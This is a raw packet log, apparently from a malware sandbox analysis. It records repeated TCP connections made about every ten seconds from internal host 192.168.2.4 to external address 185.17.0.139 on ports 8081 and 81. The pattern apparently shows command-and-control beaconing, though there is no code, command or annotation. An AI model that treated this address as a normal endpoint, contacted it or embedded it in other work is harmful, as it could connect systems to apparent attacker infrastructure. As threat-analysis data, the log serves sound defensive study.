                                                                                                                                                                                                  Dec 8, 2024 23:02:54.819288015 CET808149744185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:54.819303036 CET808149744185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:54.819370031 CET497448081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:54.830538988 CET497448081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:02:54.949837923 CET808149744185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:57.122683048 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:02:57.349034071 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.056570053 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.175885916 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.175959110 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.176217079 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.295443058 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.295490980 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.414736986 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.513887882 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.514055967 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.514105082 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.514218092 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.514257908 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.517983913 CET497528081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.637206078 CET808149752185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:07.133460999 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:07.364702940 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.614073992 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.733511925 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.733599901 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.734752893 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.734752893 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.854176044 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.854190111 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.854197979 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.226041079 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.226052999 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.226063967 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.226113081 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.226145983 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.231774092 CET497738081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.351043940 CET808149773185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:17.131409883 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:17.289484978 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.331801891 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.451240063 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.451303005 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.451493979 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.570700884 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.570755005 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.690720081 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791791916 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791812897 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791877985 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791955948 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.792002916 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.795999050 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.915273905 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.709913969 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.829355955 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.829484940 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.834790945 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.954754114 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.954844952 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:34.074161053 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344357014 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344598055 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344644070 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344691992 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344733000 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.348838091 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.468008041 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.712102890 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.831542969 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.833384991 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.833611012 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.952907085 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.955780029 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:44.075453043 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172362089 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172776937 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172904968 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172926903 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172954082 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.176467896 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.295722008 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:46.168342113 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:46.349220991 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:52.118530989 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:52.161833048 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.459135056 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578486919 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578557968 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578732967 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.697977066 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.698021889 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.817316055 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.916826963 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.916939974 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.917011976 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.917124987 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.919910908 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.920856953 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:56.040173054 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.860694885 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.980986118 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.981085062 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.994983912 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:04.114224911 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:04.114299059 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:04.233620882 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495356083 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495440006 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495589972 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.499186039 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.618407011 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:11.127850056 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:11.349302053 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:13.912282944 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.031693935 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.031776905 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.032143116 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.151348114 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.151420116 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.270771980 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378420115 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378621101 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378663063 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378746986 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378793001 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.382580042 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.501806021 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:21.127726078 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:21.364964962 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:23.882255077 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.003197908 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.003849983 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.004045963 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.123660088 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.123732090 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.243074894 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403692007 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403884888 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403927088 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.404093981 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.404135942 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.407567978 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.526783943 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:31.127914906 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:31.349370956 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:33.884744883 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004157066 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004375935 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004443884 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.123708963 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.123887062 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.243333101 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.380561113 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.381014109 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.381151915 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.381614923 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.381663084 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.384368896 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.504023075 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:43.897532940 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.016870022 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.016932964 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.017105103 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.136524916 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.136631012 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.256118059 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.436894894 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.437309980 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.437434912 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.437452078 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.437479019 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.441533089 CET499728081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.560821056 CET808149972185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:53.913172960 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.032639980 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.032723904 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.032911062 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.152453899 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.152662039 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.271997929 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.520282984 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.521155119 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.521200895 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.521209955 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.521233082 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.523804903 CET499998081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.643017054 CET808149999185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:03.913832903 CET500218081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.033273935 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.033338070 CET500218081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.037138939 CET500218081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.156733036 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.156858921 CET500218081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.276205063 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.397495985 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.397797108 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.397933006 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.397991896 CET500218081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.410484076 CET500218081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.529848099 CET808150021185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:13.917259932 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.036617994 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.036742926 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.037316084 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.156562090 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.156651974 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.275973082 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.377557993 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.377804995 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.377818108 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.377959967 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.377960920 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.381891012 CET500288081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.501176119 CET808150028185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:23.965214014 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.085048914 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.085174084 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.099725008 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.219194889 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.219249964 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.338560104 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.513113976 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.513176918 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.513223886 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.513298988 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.513344049 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.517381907 CET500308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.637643099 CET808150030185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:28.133928061 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:28.365215063 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:33.975816965 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.095330954 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.095392942 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.095611095 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.214924097 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.214975119 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.335262060 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.809159994 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.809202909 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.809232950 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.809375048 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.809375048 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.840778112 CET500338081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.960150003 CET808150033185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:38.131103039 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:38.349622965 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.271621943 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.391009092 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.391110897 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.391530991 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.510791063 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.510893106 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.630305052 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.800101042 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.800517082 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.800569057 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.800640106 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.800683022 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.803961992 CET500358081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.923284054 CET808150035185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:48.121202946 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:48.365350962 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.212673903 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.332089901 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.332305908 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.332360029 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.451677084 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.451759100 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.571331978 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.716797113 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.716912985 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.716975927 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.717068911 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.717114925 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.720781088 CET500388081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.840017080 CET808150038185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:58.181009054 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:05:58.365291119 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.479640961 CET500408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.599122047 CET808150040185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.599273920 CET500408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.599438906 CET500408081192.168.2.4185.17.0.139
